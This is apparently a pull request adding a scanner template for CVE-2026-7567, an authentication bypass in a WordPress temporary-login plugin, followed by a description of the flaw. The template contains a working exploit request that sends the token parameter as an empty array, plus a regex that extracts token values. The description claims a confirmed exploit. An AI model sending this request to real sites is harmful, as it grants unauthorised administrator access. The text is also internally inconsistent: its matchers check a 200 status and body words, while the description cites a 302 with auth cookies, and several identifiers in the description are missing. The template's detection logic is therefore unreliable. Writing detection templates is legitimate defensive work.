### PR TITLE
Adding CVE-2026-7567 - WordPress Temporary Login Auth Bypass (CVSS 9.8)

### DIFF
--- a/http/cves/2026/CVE-2026-7567.yaml
+++ b/http/cves/2026/CVE-2026-7567.yaml
@@ -1,0 +1,59 @@
+id: CVE-2026-7567
+
+info:
+  name: WordPress Temporary Login Plugin <= 1.0.0 - Authentication Bypass
+  author: Menashi-Admin
+  severity: critical
+  description: |
+    The Temporary Login plugin for WordPress is vulnerable to Authentication Bypass in versions up to and including 1.0.0.
+    This is due to improper input validation in the maybe_login_temporary_user() function, which fails to verify that
+    the 'temp-login-token' GET parameter is a scalar string before processing it. When the parameter is supplied as an
+    array, PHP's empty() check is bypassed and sanitize_key() returns an empty string, which is then passed as the
+    meta_value to get_users(). WordPress ignores an empty meta_value and returns all users matching the meta_key
+    '_temporary_login_token', allowing authentication without a valid token.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-7567
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f97c669b-86c1-4873-a050-7697ec209a1a
+    - https://github.com/advisories/GHSA-4v98-7r2c-mxg7
+    - https://plugins.trac.wordpress.org/browser/temporary-login/tags/1.0.0/core/admin.php
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-7567
+    cwe-id: CWE-287
+  tags: wordpress,wp-plugin,wp,auth-bypass,cve,cve2026
+
+variables:
+  auth_endpoint: "{{url_encode('temporary-login/v1/auth')}}"
+
+requests:
+  - raw:
+      - |+
+        GET /?rest_route=/{{auth_endpoint}}&temp-login-token[]= HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "text/html"
+          - "HTTP/1.1 200"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "temporary_login"
+          - "wp_user_token"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "temporary_login\\|([a-f0-9]+)"


### PR DESCRIPTION
## Description
Adds detection template for CVE-2026-7567 - a critical authentication bypass vulnerability (CVSS 9.8) in the WordPress Temporary Login plugin versions <= 1.0.0.

## Vulnerability details
The  function (core/admin.php:135) checks  before processing. When  is sent as an array,  returns FALSE (PHP considers an array with 1 element as non-empty), bypassing the guard.  on an array returns an empty string, which is passed to  as the meta_value. WordPress returns all users with  meta key, allowing authentication as the first matching temporary user.

## Confirmed Exploit
Tested locally against WordPress 7.0 + Temporary Login 1.0.0:

Returns 302 redirect with Set-Cookie auth cookies + redirect to /wp-admin/.

## Detection
The template sends a GET request with  (array syntax) to the REST API endpoint. Success is detected by the presence of WordPress auth cookies in the response.

## References
- https://nvd.nist.gov/vuln/detail/CVE-2026-7567
- https://github.com/advisories/GHSA-4v98-7r2c-mxg7
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f97c669b-86c1-4873-a050-7697ec209a1a